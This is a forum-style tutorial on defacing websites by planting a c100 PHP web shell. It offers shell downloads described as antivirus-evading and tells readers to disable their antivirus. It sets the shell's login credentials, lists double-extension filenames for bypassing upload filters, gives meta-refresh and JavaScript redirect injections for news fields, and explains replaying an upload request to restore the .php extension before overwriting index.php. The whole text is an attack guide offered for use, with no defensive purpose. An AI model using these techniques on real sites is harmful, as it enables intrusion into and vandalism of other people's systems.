How to Deface Websites Detailed

First of all you will need shell. I will give you modified c100 shell which I use and it is undetectable.

Download Link: DL c100v2 FUD - Mediafire
Download Link: DL c100 Not FUD - Mediafire

If you are using c100v2 skip the part about setting username/password because it don't have it. If you are using c100 wich is false positive, disable your av and continue with tutorial. First when you download c100.php you will need to edit it with notepad. And set your Username and Password, so that only one who know user/pw can access shell and website.



Thee green part, Username and passowrd edit as you like. But the md5 pass must be crypted. For that you go to:
Crypo.com - Here you will make your pass MD5



So on crypo.com you write the password you writed in c100.php in my case it is hakforums and for that I get this MD5 password, copy it and paste in our shell c100.php.

Code:

ad3dd2ebd28e5d7f81ec326fbdf1fa7b

So in my case c100 should look like this

Code:

$login = "UserulTau"; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = "isecenter"; //password
$md5_pass = "ad3dd2ebd28e5d7f81ec326fbdf1fa7b"; //md5-cryped pass. if null, md5($pass)

When you do that, save it and now find on website place where you can upload some file. Sometimes the website will block .php extension so you will have to bypass it. First open your shell with notepad and then Save As and change the extension to one of these:

Code:

shell.php;.jpg
c100.php.jpg
c100.php..jpg
c100.php.jpg
c100.php.jpg:;
c100.php.jpg%;
c100.php.jpg;
c100.php.jpg;
c100.php.jpg:;

If website doesn't have any place where you can upload files, but have place where you can add news on new event or something you can use meta http-equiv to make redirection from website to your deface page. You do that by adding this code in news:

Code:

<meta http-equiv="refresh" content="0;url=http://link_to_your_defacee_page">

You could also use javascript:

Code:

<script type="text/javascript">
<!--
window.location = "http://www.link_to_your_deface_page.html"
//-->
</script>

Once you find admin panel upload your shell, if you can't upload .php directly upload it with modified extensions as I stated above.



After you uploaded it find the link where you uploaded it, example if you uploaded it in images then it will be in site/images/c100.php After you enter the link the new Pop up windows will apear and it will ask you for login. Here you write youusername and password your wrote in c100.php. After that you should get in website.Sometimes simply extension hiding will not work so you will have to use one addon for firefox Live HTTP Headers Install it and then hide shell extension, go to the upload section. Open Live HTTP Headers and upload shell. Now if you try to go to the link where you have your shell uploaded it will give you error (only on some websites) so we will have to change that hided .php.jpg extension into the .php. So as we uploaded the shell and opened the Live HTTP Headers you should find where you have uploaded your shell. You will have to find the line where ti writes that you uploaded the shell. Select it and then click on button reply.



After that you will have to find once again the same line of code which shows that you have uploaded shell. So when you find it select the extension you used to hide original .php. In my case it is .jpg (List of all these extension is given in this tutorial at the beginning). When you select it delete it so that we have only c100.php. And after that once again click on reply.



It should take you to the shell screen and if it doesn't you will have to find manually where shell has been uploaded and go to that link. Niote: This doesn't work for every website but work for a lot. Now you are in website.



Find main index.php and edit it with your deface page source code, and click save. Thats it.